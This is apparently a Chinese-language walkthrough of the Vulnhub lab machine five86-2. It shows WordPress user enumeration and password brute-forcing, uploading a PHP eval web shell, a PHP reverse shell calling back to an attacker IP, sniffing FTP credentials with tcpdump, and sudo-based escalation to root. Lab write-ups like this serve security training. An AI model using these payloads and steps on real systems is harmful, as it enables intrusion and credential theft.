【Vulnhub】five86-2

nmap 扫描端口

访问 80 口（要改一下 hosts 文件）

是一个 wordpress，wpscan 来扫描一下看看有哪些用户

wpscan --url http://five86-2/ -e u

wpscan --url http://five86-2 -P passwords.txt -U users.txt 来爆破一下用户名和密码

Username: barney, Password: spooky1 Username: stephen, Password: apollo1

选一个登录一下，再 Add New 中新建一个 e-learning

echo "<html>hello</html>" > index.html

echo "<?php @eval ($_POST ['yichen']); ?>" > index.php

zip poc.zip index.html index.php

来生成一个 zip，然后上传，可以看到文件路径，直接访问那个 php 的后门

蚁剑连上，发现执行不了 nc 命令，在蚁剑的终端上也没法切换用户，然后写了个 system 的 php 也没法反弹 shell

找了个别的版本的 shell

<?php
$ip = '192.168.149.141';
$port = '6666';
$sock = fsockopen($ip, $port);
$descriptorspec = array(
    0 => $sock,
    1 => $sock,
    2 => $sock
);
$process = proc_open('/bin/sh',$descriptorspec, $pipes);
proc_close($process);
?>

没有 python2 所以用的 python3

python3 -c "import pty;pty.spawn('/bin/bash')"

切换到 stephen 用户

Username: stephen, Password: apollo1

ps -auxw

-a 显示同一终端下的所有程序

-aux 显示所有包含其他使用者的行程

-w 显示加宽可以显示较多的资讯

可以看到 ftp 是 paul 用户的跑的，ftp 大多数是明文传输，所以可以使用 tcpdump 抓包看一下，stephen 用户是可以运行 tcpdump 的

看一下网卡信息

cat /proc/net/dev

前面 timeout 设置一下时间，到时间就关掉进程

timeout 150 tcpdump -i veth6b4bbb1 -w ftp.pcap

-i 指定网卡

-w 保存为文件而不是标准输出

直接 cat 文件也可以看到，也可以放到 /tmp 目录，下载下来用 wrieshark 查看

得到 ftp 账户：paul:esomepasswford

尝试切换一下，成功

sudo -l 发现一个不用密码的，可以直接切换到 pater 账户的 shell

sudo -u peter service ../../../../../../bin/sh

再次 sudo -l 发现不用密码就可以执行 passwd 来修改密码

sudo passwd root 更改 root 的密码，然后切换到 root 用户就可以啦